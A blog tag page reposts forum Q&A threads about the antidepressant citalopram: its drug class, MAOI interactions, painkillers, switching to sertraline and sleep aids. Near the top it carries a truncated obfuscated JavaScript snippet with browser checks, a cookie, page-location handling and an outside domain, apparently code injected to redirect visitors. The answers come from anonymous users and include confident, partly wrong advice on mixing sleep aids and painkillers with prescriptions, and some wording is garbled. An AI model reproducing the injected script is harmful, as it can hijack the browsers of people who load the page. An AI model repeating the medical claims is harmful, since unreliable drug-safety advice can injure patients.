‘Citalopram’ Tagged Posts

Find out how to pronounce citalopram (Celexa) (Memorizing Pharmacology Flashcard)

var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTim...

 

Is citalopram (Celexa) catigory in the MAOI?

 

Is citalopram (Celexa) catigory in the MAOI?
Is citalopram (Celexa) an MAO inhibitor Best Answer (s):

City Council Oneil
Citalopram is not a MAO inhibitor class of drugs response, but to SSRIs (selective serotonin reuptake inhibitors) is one class of drugs. Which are associated mainly as an antidepressant with either standalone depression or depression with Affective Disorder, used.

Answer by Derek R
Nope, it is an SSRI.

joe’sgirl
SSRI

Answer by Simon G
No, it is an SSRI response. Sincerely, Doc

Reply rrrevils
Celexa is an antidepressant in a group of drugs called selective serotonin reuptake inhibitors (SSRIs). Do not take the medication Celexa with a monoamine oxidase inhibitor (MAOI) such as isocarboxazid (Marplan), phenelzine (Nardil), rasagiline (Azilect), selegiline (Eldepryl, Emsam), or tranylcypromine (Parnate). You need at least 14 days after stopping an MAO inhibitor before you can take Celexa wait. After you stop taking Celexa, you must wait at least 14 days before you start taking an MAOI beginnen.Also, basically, the answer is no.


Advil, Tynenol or Alive while on Citalopram and Omeprazole?

 

Advil, Tynenol or Alive while on Citalopram and Omeprazole?
Is it safe to take Advil, Tynenol or Aleve while on Citalopram and Omeprazole? I have some knee pain from an old injury and was wondering if it is safe. Should I ask a pharmasist?
Tylenol I meant, sorry.

Best answer(s):

Answer by blurb05
no worries with citalopram for any of the painkillers.
omeprazole being a pill for protecting the stomach means you have acid reflux or something similar.
advil and especially aleve can negate the effects of omeprazole. if you’ve ever had an stomach ulcer, avoid advil and aleve. if not, for a few days, it shouldn’t be a problem. at the very worst, try it out. if you have stomach pain, stop.

tylenol is pretty easy going on the stomach. no problem as long as you stick to the dosages.

Changing Anti-Depressant?? Citalopram (Celexa/Cipramil) to Sertraline (Zoloft)?

 

Changing Anti-Depressant?? Citalopram (Celexa/Cipramil) to Sertraline (Zoloft)?
I was prescribed 20mg of Citalopram (Celexa / Cipramil) but after 4 weeks, i continued to have sleeping problems. I could sleep for the first two hours but then wake up constantly thorough out the night. I thought it was a side effect but it never went. I went back to my GP and was prescribed Zopiclone (Zimovane) 7.5mg to get me to sleep. This wasn’t working so i took 15mg instead. This worked, but i argued with my GP this morning that i didn’t want a pill to get me through the day and several to get me through the night. She suggested it was still a side effect and it would disappear but i wanted to change tablets. She has now put me on Sertraline (Zoloft) 50mg. This is the same type of drug as the other, so how is it going to be any different. Does it have different ingredients? She told me to take it as normal without coming off Citalopram? Is this ok to do? Will the Sertraline work quicker? Isn’t 50mg stronger than the 20mg of Citalopram?

Has anyone had any problems with Sertaline?

Sorry for all of the questions but i don’t trust my doctor.

Many thanks in advance 🙂

Best answer(s):

Answer by sparklingdiamond484
I’m definitely not a doctor and don’t know much about medications, but for the few months I was on Zoloft I was a zombie. Couldn’t focus on any one thing and pretty much stared at the ceiling, yawning. Didn’t even realize there was anything wrong until I stopped taking it, and the first few days off were horrible.

Answer by junipersephone
I’ve never had Citalopram, but I was on and off Zoloft for a long time. It worked great for me, but at first it gave me insomnia. I started taking it in the mornings and the side effect went away.

Answer by girl_on_the_couch_inak
if you don.t trust your doc thend you should switch docs…….in taking these kinds of drugs you should see a psychiatrist rather than a gp anyways………….

Answer by paramedicgirl
Different anti-depressants work differently with everyone. I had no real effects from Zoloft, not even to reduce the depression. I’m having pretty good results with the Celexa, (had even better with Lexapro, but my insurance won’t cover it). I too was having sleeping problems, so my doc prescribed Ambien (not the CR, just plain ol’ Ambien to get me to sleep). This combination works for me, so I plan to stick with it. If you find you’re having sleep problems with the Zoloft, you may want to go ahead & take a sleep aid. Good luck!

Is it bad to take a sleeping pill when I’m already taking Citalopram and Losartan?

 

Is it bad to take a sleeping pill when I’m already taking Citalopram and Losartan?
I have a major panic/anxiety disorder. I’m taking Citalopram for my anxiety and Losartan for my blood pressure. I took a Unisom sleep gel (as well as these 2 medications) just before bed. Just moments after I dozed off to sleep, I woke up in a major panic of worry and trembling. Something similar happened before too.

Also, is it bad to take Losartan and/or Citalopram right before bed instead of in the morning after I get up? I thought that since the Citalopram has a possible drowsiness affect that it might help me to sleep.

My latest attack is caused from worrying about personal family situations. Too complicating to explain. But I thought I was handling things ok until I tried going to sleep. I really wish I could stop this severe panicking. I’m the only one my mom can rely on to help her out, and I’m useless when I get this way. If my doctor was available 24/7 I’d be tempted to go to him right now.

But back to my initial question: Can mixing a sleep drug (like Unisom) with these meds cause this intense, nervous breakdown type of attack?
Every time this major panic attack happens, my neck (and sometimes shoulders) gets real hot and tingly. Is that a drug reaction or just panic alone?

Best answer(s):

Answer by PooPooLaTrash
You should be asking your doctor or pharmacist these questions. We do not have benefit of your medical record and certainly can’t diagnose or guess at all potential untoward effects you may be experiencing from self-medicating. Suffice to say, when you are on prescription medications, adding any additional medication, whether over-the-counter or prescription, should be done with the knowledge and consent of the physician who prescribed your other medications.

Answer by Rachel
It is okay to take unisom with it in low doses but only low doses not because of the citalopram but because of the losartan (the blood pressure) however it isn’t safe to take things like Ambien (prescription pills) because i just dont think it’s worth it.

You hit the nail on the head when mentioning the taking the meds before bed instead. Either way they are going to be in your system so you can either take them before bed and sleep better and not have to worry about taking things like unisom and safety..etc, or you can take it in the morning and be tired during the day and have to take unisom..etc. So i would definitely switch, it’s a really good idea and is exactly what i did with my medication that makes me tired and i feel a lot better and save money because i dont have to buy sleeping pills anymore so im really happy i did it.

Unisom cannot give you attacks.. it is an antihistamine and that’s like saying benedryl gave you a panic attack.
If the idea of taking unisom is still bothering you because of the coincidence that you had, you can try a more natural approach and take some herbal supplements like Melatonin or GABA instead when you feel the need to take sleep aids.

Also, the hotness on your neck and shoulders is most likely due to the increase in blood flow. Your heart beats harder and faster which pumps larger amounts of your heated blood up your shoulders and neck to your head at higher pressures so all your capillaries and veins get increased blood flow and it gives you a warming sensation.